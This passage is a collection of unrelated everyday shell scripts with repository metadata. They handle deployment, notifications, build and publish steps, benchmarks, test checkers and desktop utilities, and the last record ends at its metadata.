3ed731c2d62ccc4c1c18f43682488e8acb9c4d05
|
Shell
|
Anaconda84/aura
|
/to-distrib.sh
|
UTF-8
| 266 | 2.875 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
# Deploy the working tree to $DEST: stop the service, wipe everything in
# $DEST except the db/ directory, copy the new tree in, fix ownership,
# and restart the service.
DEST=/home/server/aura
DIR=$(pwd)
/etc/init.d/aura stop
# ${DEST:?} plus the cd guard prevent the destructive find from ever
# running in the wrong directory
cd "${DEST:?}" || exit 1
# delete every top-level entry except db/; NUL-delimited for odd names
find . -maxdepth 1 -name "*" -type d \( -name db \) -prune -o -print0 | xargs -0 rm -rf
cd "$DIR" || exit 1
cp -r ./* "$DEST"
python sl.py "$DEST"
chown -R www-data:www-data "$DEST"
/etc/init.d/aura start
| true |
432af05dc760dd33fbc4708b11c68994781695c0
|
Shell
|
madhavanmalolan/N
|
/n
|
UTF-8
| 344 | 3.359375 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
# Run the given command and raise a desktop notification when it finishes,
# reporting its exit code (notify-send on Linux, osascript on macOS).
# FIX: run "$@" directly instead of rebuilding the command by string
# concatenation (which broke arguments containing spaces), and capture the
# exit code immediately (the original read $? after uname had clobbered it).
"$@"
rc=$?
unameOS="$(uname -s)"
case "${unameOS}" in
    Linux*)
        notify-send "$1 - completed" "Exit code : $rc"
        ;;
    Darwin*)
        osascript -e 'display notification "Exit code: '"$rc"'" with Title "Command \"'"$1"'\" completed"'
        ;;
esac
| true |
380020d4f60b63d565d18aaa6e91e4bff150b708
|
Shell
|
rafaelmarconiramos/Supervisor
|
/workflows/common/sh/model.sh
|
UTF-8
| 2,053 | 4 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
set -eu

# MODEL.SH
# Shell wrapper around Keras model
usage()
{
  echo "Usage: model.sh [-t TIMEOUT] FRAMEWORK PARAMS RUNID"
  echo "The environment should have:"
  echo " SITE MODEL_NAME EXPID BENCHMARK_TIMEOUT OBJ_RETURN"
  echo "If TIMEOUT is provided, we run under the shell command timeout"
}

# set -x
# echo MODEL.SH

TIMEOUT=""
while getopts "t:" OPTION
do
  # FIX: match $OPTION's value, not the literal word "OPTION" --
  # previously -t was accepted but TIMEOUT was never set.
  case $OPTION in
    t) TIMEOUT=$OPTARG ;;
    *) exit 1 ;; # Bash prints an error message
  esac
done
shift $(( OPTIND - 1 ))

if (( ${#} != 3 ))
then
  usage
  exit 1
fi

FRAMEWORK=$1 # Usually "keras"
shift
# JSON string of parameters
PARAMS="$1"
shift
RUNID=$1
shift

# Each model run, runs in its own "instance" directory
# Set instance_directory to that and cd into it.
INSTANCE_DIRECTORY=$TURBINE_OUTPUT/run/$RUNID

TIMEOUT_CMD=""
if [ -n "$TIMEOUT" ]; then
  TIMEOUT_CMD="timeout $TIMEOUT"
fi

# All stdout/stderr after this point goes into model.log !
mkdir -p "$INSTANCE_DIRECTORY"
LOG_FILE=$INSTANCE_DIRECTORY/model.log
exec >> "$LOG_FILE"
exec 2>&1
cd "$INSTANCE_DIRECTORY"

echo MODEL.SH

# get the site and source lang-app-{SITE} from workflow/common/sh folder
WORKFLOWS_ROOT=$( cd $EMEWS_PROJECT_ROOT/.. ; /bin/pwd )
source $WORKFLOWS_ROOT/common/sh/utils.sh
source_site langs-app $SITE

echo
echo PARAMS:
echo $PARAMS | print_json
echo

echo "USING PYTHON:"
which python

set -x
arg_array=( "$WORKFLOWS_ROOT/common/python/model_runner.py"
            "$PARAMS"
            "$INSTANCE_DIRECTORY"
            "$FRAMEWORK"
            "$RUNID"
            "$BENCHMARK_TIMEOUT")
MODEL_CMD="python -u ${arg_array[@]}"
# echo MODEL_CMD: $MODEL_CMD

# FIX: capture the exit status directly. In the original
# "if ! cmd; then CODE=$?" the negation made $? always 0 inside the
# branch, so the timeout (124) case was unreachable.
CODE=0
$TIMEOUT_CMD python -u "${arg_array[@]}" || CODE=$?
if [ $CODE -ne 0 ]
then
  if [ $CODE == 124 ]; then
    echo "Timeout error in $MODEL_CMD"
    exit 0 # This will trigger a NaN (the result file does not exist)
  else
    echo "Error in $MODEL_CMD"
    exit 1 # Unknown error in Python: abort the workflow
  fi
fi

exit 0 # Success
| true |
a5efeeedabd7076dee58a03097d5095243f62cc2
|
Shell
|
WebAhmed/dotfiles-2
|
/scripts/start_ranger.sh
|
UTF-8
| 372 | 2.546875 | 3 |
[] |
no_license
|
#!/bin/bash
# Attach to (or create) a dedicated tmux session running ranger; if the
# session exists but ranger has exited, relaunch it first.
if ! tmux has-session -t "ranger" 2> /dev/null; then
    tmux new-session -d -s "ranger" -n "ranger"
    tmux send-keys -t "ranger:1" "ranger" C-m
    tmux attach-session -t "ranger:1"
else
    # pgrep -f replaces the fragile "ps -elf | grep | grep" chain
    if ! pgrep -f '/usr/bin/ranger' > /dev/null; then
        tmux send-keys -t "ranger:1" "ranger" C-m
    fi
    tmux attach-session -t "ranger:1"
fi
exit
| true |
e73116e96d0f5b2c7909a2d219e65d70d4e29ee0
|
Shell
|
ballachi/Politehnica
|
/Politehnica/Parser java/tests_greedy_public/checker.sh
|
UTF-8
| 645 | 3.5625 | 4 |
[] |
no_license
|
#!/bin/bash
# Build the project, run it on each public test with a 10s timeout, diff
# the output against the reference, and report a score out of 100.
# fetch tests and results
input_dir="./tests/in"
output_dir="./tests/out"
refs_dir="./tests/ref"
# -p: don't fail when the directory is left over from a previous run
mkdir -p "$output_dir"
# compile and make jar
ant compile &>/dev/null
ant jar &>/dev/null
scor=0
tests=10
pointsPerTest=$((100 / tests))
for i in $(seq 1 $tests); do
    timeout 10 java -jar tema.jar "$input_dir/test$i.in" "$output_dir/test$i.out" &> /dev/null
    if diff -B "$output_dir/test$i.out" "$refs_dir/test$i.ref" &> /dev/null; then
        echo "Test $i correct"
        # FIX: score by the computed per-test value instead of hard-coded 10
        scor=$((scor + pointsPerTest))
    else
        echo "Test $i failed"
    fi
done
echo "Total [$scor/100] points"
rm -r "$output_dir"
ant clean &> /dev/null
| true |
63df68c58ac38f28a834901ecebb2d5ba8b6e228
|
Shell
|
LukasRypl/variousLinuxScripts
|
/touchpadToggle.sh
|
UTF-8
| 570 | 3.734375 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
# Toggle the Synaptics touchpad on/off via synclient, showing the new
# state both on the terminal and as a desktop notification.
# synclient commandline utility to query and modify Synaptics driver parameters
# notify-send for displaying info
state=$(synclient -l | grep TouchpadOff | awk '{print $3}')

# Announce the new state via notify-send and stdout.
show() {
    notify-send -t 3 "$1"
    echo "$1"
}

case "$state" in
    0)
        synclient TouchpadOff=1
        # TODO Toggle LED state - something like sudo su -c 'echo 0 >/sys/class/leds/dell-laptop::touchpad/brightness'
        show "Touchpad is OFF"
        ;;
    1)
        synclient TouchpadOff=0
        show "Touchpad activated"
        ;;
    *)
        show "Touchpad state is unknown"
        ;;
esac
| true |
7a1dfb93ea5be04487855257a703aedde8c430af
|
Shell
|
Artimirche6/TerminalCommand
|
/assignment1/folderExits.sh
|
UTF-8
| 267 | 3.78125 | 4 |
[] |
no_license
|
#! /bin/bash -x
# Prompt for a folder name and create it unless it already exists.
# -r keeps backslashes literal; quoting protects names with spaces
read -r -p " Enter the folder Name : " folderName
if [ -d "$folderName" ]
then
    echo "$folderName folder already exists."
else
    echo " $folderName folder doesn't exits "
    mkdir "$folderName"
    echo "$folderName folder created "
fi
| true |
ae5019cb08b2b6a176dfc2c2e7cf20f799158919
|
Shell
|
Herrie82/cmst
|
/images/generate.sh
|
UTF-8
| 332 | 2.609375 | 3 |
[] |
no_license
|
#!/bin/bash
#
# Generate the cmst application icon at every standard size from the SVG
# source, one PNG per <size>x<size> directory.
#
#
for size in 16 20 22 24 32 36 40 48 64 72 96 128 192 256 384 512; do
    out_dir="./${size}x${size}"
    mkdir -p "$out_dir"
    convert ./cmst-icon.svg -transparent white -filter box -resize ${size}x${size} -unsharp 0x6+0.5+0 -background "rgba(0,0,0,0)" -flatten "$out_dir/cmst.png"
done
| true |
2115d958911784c9df8c5eb1c8f7a656a5eabffb
|
Shell
|
samyuyagati/actor-ft-experiments
|
/run_video_benchmark.sh
|
UTF-8
| 1,869 | 2.921875 | 3 |
[] |
no_license
|
#!/bin/bash
# Run the video-processing fault-tolerance benchmark under each recovery
# strategy, once without and once with a simulated failure.
# 'failure' flag can be omitted to achieve a failure-free execution.
# 'recovery' flag has three possible values: app_lose_frames (app-level
# recovery that tolerates missing frames), app_keep_frames (app-level recovery
# that does not tolerate missing frames), and checkpoint (the default, which
# simulates global checkpointing + rollback).
# DO NOT set the checkpoint-freq flag unless you want checkpoint recovery.
# ----- Run benchmarks -----
# Simulate one failure about halfway through processing and with
# simulated application-level recovery that tolerates missing frames.
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --recovery app_lose_frames
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --failure --recovery app_lose_frames
# Simulate one failure about halfway through processing and with
# simulated application-level recovery that does not allow missing frames.
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --recovery app_keep_frames
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --failure --recovery app_keep_frames
# Simulate one failure about halfway through processing and with
# simulated global checkpointing for recovery. To vary the checkpoint frequency,
# simply specify a different number with the checkpoint-freq flag (the
# command below sets it to one checkpoint per ten frames processed).
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --checkpoint-freq 30 --recovery checkpoint
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --failure --checkpoint-freq 30 --recovery checkpoint
# same pair again with log-based recovery
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --checkpoint-freq 30 --recovery log
python3 video_benchmark_debugging.py --video-path videos/husky.mp4 --failure --checkpoint-freq 30 --recovery log
| true |
49fd0bc1f35b924b708a70bdbd31d3a10cc8a585
|
Shell
|
JOJO-IAP/drycore
|
/header.sh
|
UTF-8
| 627 | 3.65625 | 4 |
[] |
no_license
|
#!/usr/bin/env bash
#------------------------------------------------------------------------------#
# Basic functions used throughout this repo
#------------------------------------------------------------------------------#
# Print the usage line (global $usage) and an error to stderr, then exit.
#   $1 = exit status, $2 = error message
raise() {
  echo "Usage: $usage" >&2
  echo "Error: $2" >&2
  exit "$1"
}

# Check NCL log. NCL sometimes fails to spawn child process for displaying time
# information -- ignore these errors. Also Execute.c is always shown as error
# alongside specific function error, so ignore that one.
# Succeeds iff the log in $1 contains no other 'fatal:' lines.
nclcheck() {
  ! grep -v 'Execute.c' "$1" | grep -v 'systemfunc' | grep 'fatal:' &>/dev/null
}
| true |
ac8f06cdb9310026c03f220de6fc105fe7aacfb6
|
Shell
|
livingstonb/WorkFromHome
|
/OES/build/code/unzip_data.sh
|
UTF-8
| 112 | 2.90625 | 3 |
[] |
no_license
|
#!/bin/bash
# Extract every .zip under build/input/raw into a sibling directory named
# after the archive; -n never overwrites already-extracted files.
# NUL-delimited find survives paths with spaces (the original word-split
# the find output).
find build/input/raw -name "*.zip" -print0 |
while IFS= read -r -d '' zip
do
	unzip -n "$zip" -d "${zip%.*}"
done
| true |
5051fc3a298b01683d130d61858eec807bde2e7a
|
Shell
|
lukechurch/sintr
|
/analysis_server_example/tools/compact_datasets.sh
|
UTF-8
| 1,066 | 2.8125 | 3 |
[
"Apache-2.0"
] |
permissive
|
set -e
# Mirror analysis-server session data between GCS buckets, back up and
# archive the sorted sessions and results, then prune incoming data older
# than 45 days.
echo "Sync dart-usage to liftoff-dev"
gsutil -m cp -n gs://dart-analysis-server-sessions-sorted/compressed/* \
	gs://liftoff-dev-datasources-analysis-server-sessions-sorted

echo "Backup"
gsutil -m cp -n -r gs://dart-analysis-server-sessions-sorted \
	gs://dart-analysis-server-sessions-sorted-backup

echo "Sync to archive"
gsutil -m cp -n -r gs://dart-analysis-server-sessions-sorted \
	gs://dart-analysis-server-sessions-sorted-archive
gsutil -m cp -n -r gs://liftoff-dev-datasources-analysis-server-sessions-sorted/* \
	gs://liftoff-dev-datasources-archive-dra/liftoff-dev-datasources/analysis-server-sessions
gsutil -m cp -n -r gs://liftoff-dev-results \
	gs://liftoff-dev-results-archive

echo "Delete files in the incoming buckets that are older than 45 days"
dart bin/delete_older_than.dart dart-usage dart-analysis-server-sessions-sorted 45
dart bin/delete_older_than.dart liftoff-dev liftoff-dev-datasources-analysis-server-sessions-sorted 45

echo "Delete old results"
dart bin/delete_older_than.dart liftoff-dev liftoff-dev-results 45
| true |
28f129138ea9c842c29a5c4df56d3857f1732c63
|
Shell
|
PapaZack80/retroroller
|
/mame2003-plus-libretro/PKGBUILD
|
UTF-8
| 883 | 2.5625 | 3 |
[] |
no_license
|
# Maintainer: valadaa48 <valadaa48@gmx.com>
# PKGBUILD for the mame2003-plus libretro core, patched and built for the
# "goadvance" platform (aarch64 handhelds).
_pkgname=mame2003-plus-libretro
pkgname=mame2003plus_libretro
pkgver=2611.0134c428
pkgrel=1
pkgdesc="Updated 2018 version of MAME (0.78) for libretro. with added game support plus many fixes and improvements "
arch=('aarch64')
url="https://github.com/libretro/mame2003-plus-libretro"
license=('GPL')
makedepends=('git')
source=(
	'git+https://github.com/libretro/mame2003-plus-libretro'
	'target.patch'
)
md5sums=('SKIP'
	'82e179db876c6524a22c8670ac5f79d5')
# version = commit count + short hash of the checked-out revision
pkgver() {
	cd ${_pkgname}
	echo "$(git rev-list --count HEAD).$(git rev-parse --short HEAD)"
}
# apply the platform/target patch before building
prepare() {
	cd ${_pkgname}
	patch -p1 < ../target.patch
}
build() {
	cd ${_pkgname}
	make platform=goadvance V=1 VERBOSE=1 clean
	make platform=goadvance V=1 VERBOSE=1
}
package() {
	install -Dm755 ${_pkgname}/mame2003_plus_libretro.so -t ${pkgdir}/usr/share/libretro
}
| true |
59b1df0884794ddd5e9b08f40e24cba5b56cfc6a
|
Shell
|
theosp/osp-dist
|
/sys-root/home/theosp/.bash/function/recursive_search.sh
|
UTF-8
| 789 | 3.734375 | 4 |
[] |
no_license
|
#!/bin/bash
# Recursive search string in path's files
# rs(needle, path=".")
# Prints file:line:match for every hit under path.
rs () {
    local needle="$1"
    local path="${2:-.}"
    # FIX: use the named local (the original declared it but grepped "$1")
    find "$path" -type f -exec grep -Hn "$needle" {} \;
}

# Limited recursive search: truncates matched lines longer than max_length.
# lrs(needle, max_length=350, path="."); LRS_MAX_LENGHT overrides $2 and
# LRS_QUIET=true hides the trailing notes.
lrs () {
    local needle="$1"
    # precedence: LRS_MAX_LENGHT env var, then $2, then 350
    local max_length="${LRS_MAX_LENGHT:-${2:-350}}"
    local path="${3:-.}"
    rs "$needle" "$path" | platformSed -e "s/\([^:]*:[^:]*:\).\{$max_length\}.*/\\1 <<<Too Long line replaced > $max_length >>>/g"
    if [[ ! $LRS_QUIET == "true" ]]; then
        echo ""
        echo "// lrs notes "
        echo "// use LRS_QUIET="true" to hide this section"
        echo "// use LRS_MAX_LENGHT to change the max line length allowed (current $max_length)"
    fi
}

# vim:ft=bash:
| true |
996fe015860d0f5c52520ce043e1c7ba6b03bb12
|
Shell
|
duanyiting2018/Rogic_RaspberryPi
|
/duanyiting/28.sh
|
UTF-8
| 264 | 2.734375 | 3 |
[] |
no_license
|
# Demonstrate how positional parameters behave inside a shell function:
# $0 stays the script name while $1/$#/$@ reflect the function's own args.
passed(){
    first_arg=$1
    echo "passed():\$0 is $0"
    echo "passed():\$1 is $1"
    echo "passed():args:$#"
    echo "passed():all args (\$@) passed to me - \"$@\""
}

echo "**** calling passed() first ****"
passed one
echo "**** calling passed() second ****"
passed one two three
| true |
ce4b557b274151548652349164226dabae06e6c4
|
Shell
|
cxy592394546/Distribute-System-Homework
|
/homework1/1853444-hw1-q4.sh
|
UTF-8
| 2,027 | 3.234375 | 3 |
[] |
no_license
|
#!/bin/bash
# Prerequisite: passwordless SSH login to the remote machines must already
# be configured before running this script!!!
# Runs the q2/q3 benchmark scripts on three remote hosts, copies each
# host's log back, extracts the per-host average from line 4, and writes
# all three plus the overall average into 1853444-hw1-q4.log.
scriptfile1=1853444-hw1-q2.sh
scriptfile2=1853444-hw1-q3.sh
log_file_name=1853444-hw1-q3.log
new_file_name=1853444-hw1-q4.log
path=/mnt/e/分布式系统/hw1/temp
cpdir1=cp1
cpdir2=cp2
cpdir3=cp3
# recreate the local result log from scratch
if [ ! -f "./$new_file_name" ]
then
	touch ./$new_file_name
elif [ -f "./$new_file_name" ]
then
	rm ./$new_file_name
	touch ./$new_file_name
fi
sum=0.00
ip_addr=(100.68.120.250 192.168.91.140 192.168.91.141)
# ip_addr holds the addresses (as used during the experiment) of the three
# other machines: the first runs CentOS 7; the other two are CentOS 8
# virtual machines hosted on Windows 10.
if [ ! -d "$path/$cpdir1" ]
then
	mkdir $path/$cpdir1
elif [ -f "$path/$cpdir1/*" ]
then
	rm $path/$cpdir1/*
fi
# host 1: run q2/q3 remotely, fetch the log, record its reported average
ssh xinyu@${ip_addr[0]} <$scriptfile1
ssh xinyu@${ip_addr[0]} <$scriptfile2
scp xinyu@${ip_addr[0]}:/home/xinyu/$log_file_name $path/$cpdir1
val1=$(awk 'NR == 4 {print $NF}' $path/$cpdir1/$log_file_name)
echo -n "平均值1 $val1 " >> ./$new_file_name
sum=$(echo "scale=2;$sum+$val1" | bc)
if [ ! -d "$path/$cpdir2" ]
then
	mkdir $path/$cpdir2
elif [ -f "$path/$cpdir2/*" ]
then
	rm $path/$cpdir2/*
fi
# host 2: same procedure (NB: extracts field $6 rather than $NF)
ssh xinyu@${ip_addr[1]} < $scriptfile1
ssh xinyu@${ip_addr[1]} < $scriptfile2
scp xinyu@${ip_addr[1]}:/home/xinyu/$log_file_name $path/$cpdir2
val2=$(awk 'NR == 4 {print $6}' $path/$cpdir2/$log_file_name)
echo -n "平均值2 $val2 " >> ./$new_file_name
sum=$(echo "scale=2;$sum+$val2" | bc)
if [ ! -d "$path/$cpdir3" ]
then
	mkdir $path/$cpdir3
elif [ -f "$path/$cpdir3/*" ]
then
	rm $path/$cpdir3/*
fi
# host 3: same procedure
ssh xinyu@${ip_addr[2]} < $scriptfile1
ssh xinyu@${ip_addr[2]} < $scriptfile2
scp xinyu@${ip_addr[2]}:/home/xinyu/$log_file_name $path/$cpdir3
val3=$(awk 'NR == 4 {print $6}' $path/$cpdir3/$log_file_name)
echo "平均值3 $val3 " >> ./$new_file_name
sum=$(echo "scale=2;$sum+$val3" | bc)
# overall average across the three hosts (bc drops the leading zero)
aval=$(echo "scale=2;$sum/3" | bc)
echo "平均值 0$aval" >> ./$new_file_name
echo "平均值 0$aval"
| true |
b42bd5eac37811d68623248798fde56d6371e93b
|
Shell
|
rustamatics/rumo
|
/turtles/android-shell/bin/clean
|
UTF-8
| 249 | 3.1875 | 3 |
[] |
no_license
|
#!/bin/bash
# Remove the app module's external native-build cache, if it exists.
script_dir="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
repo_root="$( cd "$script_dir/.." && pwd )"
cache_dir="$repo_root/app/.externalNativeBuild"
if [ -d "$cache_dir" ]; then
  # echo "Clearing External Build Cache"
  rm -rf "$cache_dir"
fi
| true |
3273668b9852161dbe65804d3e7d5c733260debc
|
Shell
|
hnil/opm-build
|
/build_opm.sh
|
UTF-8
| 3,055 | 3.484375 | 3 |
[] |
no_license
|
#!/bin/bash
# Pull, configure and build the OPM module stack from opm-src/, in dependency
# order. Optionally (BUILD_ERT_EIGEN=true) builds/installs libecl and eigen3
# first. CLEAN_BUILD wipes each build/ dir; UPDATE pulls each repo; NP is the
# make parallelism.
BUILD_ERT_EIGEN=false # also libecl
#BUILD_LIBECL_EIGEN=false
CLEAN_BUILD=false
CMAKE_FILE=opm-building/debugopts_mpi.cmake
UPDATE=true
NP=1
if [ ! -d opm-src ]; then
echo "opm-src do not exit"
exit 1
fi
cd opm-src
# to do full build with ont ert and eigen this needs to be uncommented
if [ "$BUILD_ERT_EIGEN" == true ]; then
echo "INSTALLING ERT and EIGEN"
if [ -d libecl ]; then
cd libecl
if [ ! -d build ];then
mkdir build
fi
if [ "$UPDATE" == true ]; then
git pull
# NOTE(review): ${r} is not defined yet in this section (it is only set in
# the module loop below), so these messages print an empty name here.
if [ $? -eq 0 ]; then
echo "update ${r} succesfully"
else
echo "update of ${r} failed"
exit 1;
fi
fi
if [ "$CLEAN_BUILD" == true ]; then
echo "clean build by deleting build directory"
rm -rf build
mkdir build
fi
cd build
cmake ..
make -j $NP
sudo make install
cd ../../
else
echo "libecrl notexist"
exit 1;
fi
# if [ -d ert ]; then
# cd ert
# if [ ! -d build ];then
# mkdir build
# fi
# if [ "$UPDATE" == true ]; then
# git pull
# if [ $? -eq 0 ]; then
# echo "update ${r} succesfully"
# else
# echo "update of ${r} failed"
# exit 1;
# fi
# fi
# cd build
# cmake .. -DBUILD_PYTHON=ON -DBUILD_APPLICATIONS=ON -DCMAKE_BUILD_TYPE=Release
# make -j $NP
# sudo make install
# cd ../../
# else
# echo "ert not exist"
# exit 1;
# fi
if [ -d eigen3 ]; then
cd eigen3
if [ ! -d build ];then
mkdir build
fi
if [ "$UPDATE" == true ]; then
git pull
if [ $? -eq 0 ]; then
echo "update ${r} succesfully"
else
echo "update of ${r} failed"
exit 1;
fi
fi
if [ "$CLEAN_BUILD" == true ]; then
echo "clean build by deleting build directory"
rm -rf build
mkdir build
fi
cd build
cmake ..
# Eigen is header-only, so install straight after configure (no make step).
sudo make install
cd ../../
else
echo "eigen not exist"
exit 1;
fi
fi
# Build order matters: each module depends on the ones listed before it.
master_order='opm-common opm-parser opm-material opm-grid opm-output opm-core ewoms opm-simulators opm-upscaling'
#master_order='opm-common opm-parser opm-material opm-grid opm-output opm-core ewoms opm-simulators opm-upscaling'
repos=$master_order
for r in $repos; do
if [ -d "$r" ]; then
cd "${r}"
else
echo " do not exit ${r} exist"
exit 1
fi
if( [ ! -d build ]); then
mkdir build
fi
if [ "$CLEAN_BUILD" == true ]; then
echo "clean build by deleting build directory"
rm -rf build
mkdir build
fi
if [ "$UPDATE" == true ]; then
git pull
if [ $? -eq 0 ]; then
echo "update ${r} succesfully"
else
echo "update of ${r} failed"
exit 1;
fi
fi
cd build
# cmake is only re-run on clean builds; incremental builds reuse the cache.
if [ "$CLEAN_BUILD" == true ]; then
echo "Start cmake ${r}"
#cmake -C $CMAKE_FILE
cmake -DUSE_MPI=1 ..
if [ $? -eq 0 ]; then
echo "cmake ${r} succesfully"
else
echo "cmake of ${r} failed"
exit 1;
fi
fi
echo "Start compiling ${r}"
make -j $NP
if [ $? -eq 0 ]; then
echo "compiled ${r} succesfully"
else
echo "compilation of ${r} failed"
exit 1;
fi
cd ../../
done
| true |
978c865f8cf998002403b1bf6728358c4c1164fa
|
Shell
|
malscent/IntervalCronGenerator
|
/publish.sh
|
UTF-8
| 2,205 | 3.5625 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
# Test, build, pack and (on master/develop) publish the IntervalCronGenerator
# NuGet packages. Non-master branches get a "pre" version suffix.
# Env: INTERVAL_CRON_GENERATOR_KEY - NuGet API key (required for publishing).
export CSPROJ_PATH="./IntervalCronGenerator.Core/"
export PROJECT_NAME="IntervalCronGenerator.Core.csproj"
export GIT_BRANCH=$(git branch | cut -c 3-)
export TEST_PROJECT="./IntervalCronGeneratorTests/IntervalCronGeneratorTests.csproj"
export NUGET_SERVER="https://api.nuget.org/v3/index.json"
export BUILD_DIR="./build"
export TOOL_DIR="./IntervalCronGeneratorCLI/"
export TOOL_PROJECT_NAME="IntervalCronGeneratorCLI.csproj"
set -eu
# NOTE(review): `git branch | cut -c 3-` yields every local branch (one per
# line), not just the current one; the "master" comparisons below only work
# when a single branch exists — consider `git rev-parse --abbrev-ref HEAD`.
project=$(basename -s .csproj "$CSPROJ_PATH$PROJECT_NAME")
version=$(sed -n 's:.*<Version>\(.*\)</Version>.*:\1:p' "$CSPROJ_PATH$PROJECT_NAME")
# Deliberately unquoted when used below so it word-splits into two arguments.
# Fix: the previous value ('--version-suffix "pre"') kept the inner double
# quotes as literal characters after word splitting, so dotnet received the
# suffix `"pre"` and the produced .nupkg never matched $nupkg_file.
version_suffix='--version-suffix pre'
toolproject=$(basename -s .csproj "$TOOL_DIR$TOOL_PROJECT_NAME")
tool_version=$(sed -n 's:.*<Version>\(.*\)</Version>.*:\1:p' "$TOOL_DIR$TOOL_PROJECT_NAME")
nupkg_file=./build/$project.$version-pre.nupkg
tool_file=./build/$toolproject.$tool_version-pre.nupkg
echo "Project: $project"
echo "Branch: $GIT_BRANCH"
echo "Testing $project version: $version"
dotnet test "$TEST_PROJECT"
# Nuget packages default to "pre" release unless on master
if [ "$GIT_BRANCH" == "master" ]; then
echo "Building production release"
nupkg_file=./build/$project.$version.nupkg
tool_file=./build/$toolproject.$tool_version.nupkg
version_suffix=''
fi
dotnet build "$CSPROJ_PATH$PROJECT_NAME" --configuration Release --framework netstandard2.0
dotnet build "$CSPROJ_PATH$PROJECT_NAME" --configuration Release --framework netstandard2.1
# $version_suffix intentionally unquoted: empty -> no args, else two args.
dotnet pack "$CSPROJ_PATH$PROJECT_NAME" -o "$BUILD_DIR" --include-symbols $version_suffix --configuration Release
dotnet pack "$TOOL_DIR$TOOL_PROJECT_NAME" -o "$BUILD_DIR" $version_suffix --configuration Release
# Only publish when building on master or develop
if [ "$GIT_BRANCH" == "master" ] || [ "$GIT_BRANCH" == "develop" ]; then
echo "Publishing $nupkg_file to $NUGET_SERVER"
# Publish to nuget using NUGET_SERVER and NUGET_API_KEY env variables
dotnet nuget push "$nupkg_file" -s "$NUGET_SERVER" -k "$INTERVAL_CRON_GENERATOR_KEY" -t 60 -n --force-english-output --skip-duplicate
dotnet nuget push "$tool_file" -s "$NUGET_SERVER" -k "$INTERVAL_CRON_GENERATOR_KEY" -t 60 -n --force-english-output --skip-duplicate
fi
| true |
d045790c078b2b00361c55ee6c44a2ee70fd3f47
|
Shell
|
KennyIT3/LinuxScripts
|
/Scripts/Trace.sh
|
UTF-8
| 597 | 3.375 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
# Copy the most recently listed server directory into the DataCopy area, then
# gather Linux/Admin/Bash-named files there.
Path="/data01/Server/*"
DEST="/data01/DataCopy"
Dest2="/data01/Linux"
#NEWEST=$(ls -trld $Path | head -1)
# Last directory reported by find under /data01/Server (depth 1 only).
NEWEST=$(find $Path -type d -prune -exec ls -d {} \; | tail -n 1)
mkdir ${Dest2}
if [ -d "${NEWEST}" ] ; then
echo "The most recent entry is a directory"
cp -Rp "${NEWEST}" "${DEST}"
# NOTE(review): this finds files already under /data01/DataCopy and copies
# them back into /data01/DataCopy (onto themselves) — presumably the target
# was meant to be $Dest2; confirm intent.
COPY=$(find /data01/DataCopy -type f | grep -E 'Linux|Admin|Bash' | xargs -i cp -rp {} /data01/DataCopy)
echo $COPY
ls -al ${Dest2}
# NOTE(review): exiting 1 on the success path (and 0 only on the fallback
# branch) inverts the usual convention — verify callers expect this.
exit 1
elif [ -z "${NEWEST}" ] ; then
echo "No file to copy"
exit 1
else
echo "Exiting"
exit 0
fi
| true |
84490e709b2de59a0efed17321246c48b4c83586
|
Shell
|
dune-universe/dune-universe
|
/packages/get_line.7.0.0/test.sh
|
UTF-8
| 1,114 | 2.828125 | 3 |
[] |
no_license
|
#!/bin/bash
# Smoke test for the get_line executable: compare its range-selection output
# against equivalent seq/printf expansions on a 10-line fixture.
#set -x # DEBUG
tmp=`mktemp`
seq 1 10 > $tmp
# set -x
GET_LINE=_build/default/src/get_line.exe
# 1st line
diff <($GET_LINE -r 1 -i $tmp) <(seq 1 1)
# 2nd line
diff <($GET_LINE -r 2 -i $tmp) <(seq 2 2)
# 3rd line
diff <($GET_LINE -r 3 -i $tmp) <(seq 3 3)
# lines 2 to 5
diff <($GET_LINE -r 2..5 -i $tmp) <(seq 2 5)
# all but line 1
diff <($GET_LINE -r 1 -i $tmp -v) <(seq 2 10)
# all but line 2
diff <($GET_LINE -r 2 -i $tmp -v) <(seq 1 1; seq 3 10)
# all but line 3
diff <($GET_LINE -r 3 -i $tmp -v) <(seq 1 2; seq 4 10)
# all but lines 2 to 5
diff <($GET_LINE -r 2..5 -i $tmp -v) <(seq 1 1; seq 6 10)
# first three lines
diff <($GET_LINE -r +3 -i $tmp) <(seq 1 3)
# last three lines
diff <($GET_LINE -r -3 -i $tmp) <(seq 8 10)
# lines 1,5 and 10
diff <($GET_LINE -r 1,5,10 -i $tmp) <(printf "1\n5\n10\n")
# lines 1,2 and 8,9,10
diff <($GET_LINE -r 2:3 -i $tmp) <(printf "1\n2\n8\n9\n10\n")
# The remaining invocations are expected to fail or be nondeterministic, so
# they are only traced (set -x), not diffed.
set -x
#errors
$GET_LINE -r 0 -i $tmp
$GET_LINE -r 11 -i $tmp
$GET_LINE -r 10..12 -i $tmp
$GET_LINE -r 12..15 -i $tmp
#different each time
$GET_LINE -r +10 -i $tmp --rand
set +x
rm -f $tmp
| true |
fa3edc93d2d12fccebf8479a5b6d3774ab4b9295
|
Shell
|
szaffarano/dotfiles
|
/tools/bin/mpid
|
UTF-8
| 348 | 3.46875 | 3 |
[] |
no_license
|
#!/bin/bash
# Print the PID of the single running Mule runtime JVM (a Tomcat "Bootstrap"
# process that is not Anypoint Studio). Exit 1 if none, 2 if more than one.
pids=$(
	jps -v |
		grep Bootstrap |
		grep -v Studio |
		awk '{ print $1 }'
)
count=$(echo "$pids" | wc -w)
if [[ -z "$pids" ]]; then
	echo "No mule runtime instance running"
	exit 1
fi
if [[ $count -gt 1 ]]; then
	echo "$count instances of mule runtime found, expected 1: $pids"
	exit 2
fi
echo "$pids"
| true |
570fad0930226a62d25493e66ab7dcc168a0d2fb
|
Shell
|
htrc/HTRC-DataCapsules
|
/backend/switch.sh
|
UTF-8
